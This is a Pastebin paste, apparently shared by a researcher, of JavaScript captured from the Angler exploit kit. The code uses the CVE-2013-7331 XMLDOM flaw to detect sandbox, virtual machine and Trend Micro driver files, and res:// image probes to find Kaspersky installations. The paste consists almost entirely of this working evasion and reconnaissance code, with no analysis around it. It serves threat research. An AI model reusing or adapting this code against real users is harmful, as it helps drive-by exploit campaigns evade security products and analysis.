Kafeine

AnglerEK_CVE-2013-7331_2014-10-02

Oct 2nd, 2014
712
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.   function gs7sfd(txt) {
  2.       var xmlDoc = new ActiveXObject("Microsoft.XMLDOM"),
  3.           subpath = "c:\\Windows\\System32\\drivers\\" + txt + ".sys";
  4.       xmlDoc.async = true;
  5.       xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://' + subpath + '">');
  6.       if (xmlDoc.parseError.errorCode != 0) {
  7.           var pe = xmlDoc.parseError,
  8.               err = "Error Code: " + pe.errorCode + "\n";
  9.           err += "Error Reason: " + pe.reason;
  10.           err += "Error Line: " + pe.line;
  11.           if (err.indexOf("-2147023083") > 0) {
  12.               return 1;
  13.           } else {
  14.               return 0;
  15.           }
  16.       }
  17.       return 0;
  18.   }
  19.   if (gs7sfd("kl1") || gs7sfd("tmactmon") || gs7sfd("tmcomm") || gs7sfd("tmevtmgr") || gs7sfd("TMEBC32") || gs7sfd("tmeext") || gs7sfd("tmnciesc") || gs7sfd("tmtdi") || gs7sfd("vm3dmp") || gs7sfd("vmusbmouse") || gs7sfd("vmmouse") || gs7sfd("vmhgfs") || gs7sfd("VBoxGuest") || gs7sfd("VBoxMouse") || gs7sfd("VBoxSF") || gs7sfd("VBoxVideo") || gs7sfd("prl_boot") || gs7sfd("prl_fs") || gs7sfd("prl_kmdd") || gs7sfd("prl_memdev") || gs7sfd("prl_mouf") || gs7sfd("prl_pv32") || gs7sfd("prl_sound") || gs7sfd("prl_strg") || gs7sfd("prl_tg") || gs7sfd("prl_time")) {
  20.       Target();
  21.   } else {
  22.       function Check(s) {
  23.           x = new Image();
  24.           x.onload = Target;
  25.           x.src = s;
  26.           return 0;
  27.       }
  28.       var kv1 = "res://C:\\Program Files",
  29.           kv2 = "\\Kaspersky Lab\\Kaspersky ",
  30.           kv3 = "Anti-Virus ",
  31.           kv4 = "Internet Security ",
  32.           kv5 = "\\shellex.dll/#2/#102",
  33.           kv6 = "\\mfc42.dll/#2/#26567",
  34.           pathdata = [kv1 + kv2 + kv3 + '5.0 for Windows Workstations' + kv5, kv1 + kv2 + kv3 + '6.0 for Windows Workstations' + kv5, kv1 + kv2 + kv3 + '6.0' + kv5, kv1 + kv2 + kv3 + '7.0' + kv5, kv1 + kv2 + kv3 + '2009' + kv6, kv1 + kv2 + kv3 + '2010' + kv6, kv1 + kv2 + kv3 + '2011\\avzkrnl.dll/#2/BBALL', kv1 + kv2 + kv3 + '2012\\x86' + kv6, kv1 + kv2 + kv3 + '2013\\x86' + kv6, kv1 + kv2 + kv4 + '6.0' + kv5, kv1 + kv2 + kv4 + '7.0' + kv5, kv1 + kv2 + kv4 + '2009' + kv6, kv1 + kv2 + kv4 + '2010' + kv6, kv1 + kv2 + kv4 + '2011\\avzkrnl.dll/#2/BBALL', kv1 + kv2 + kv4 + '2012\\x86' + kv6, kv1 + kv2 + kv4 + '2013\\x86' + kv6, kv1 + kv2 + kv4 + '14.0.0\\x86' + kv6, kv1 + kv2 + kv4 + '15.0.0\\x86' + kv6, kv1 + kv2 + 'PURE' + kv6, kv1 + kv2 + 'PURE 2.0\\x86' + kv6, kv1 + kv2 + 'PURE 3.0\\x86' + kv6, kv1 + ' (x86)' + kv2 + kv3 + '2013\\x86' + kv6, kv1 + ' (x86)' + kv2 + kv4 + '2013\\x86' + kv6, kv1 + ' (x86)' + kv2 + 'PURE' + kv6, kv1 + ' (x86)' + kv2 + 'PURE 2.0\\x86' + kv6, kv1 + ' (x86)' + kv2 + 'PURE 3.0\\x86' + kv6];
RAW Paste Data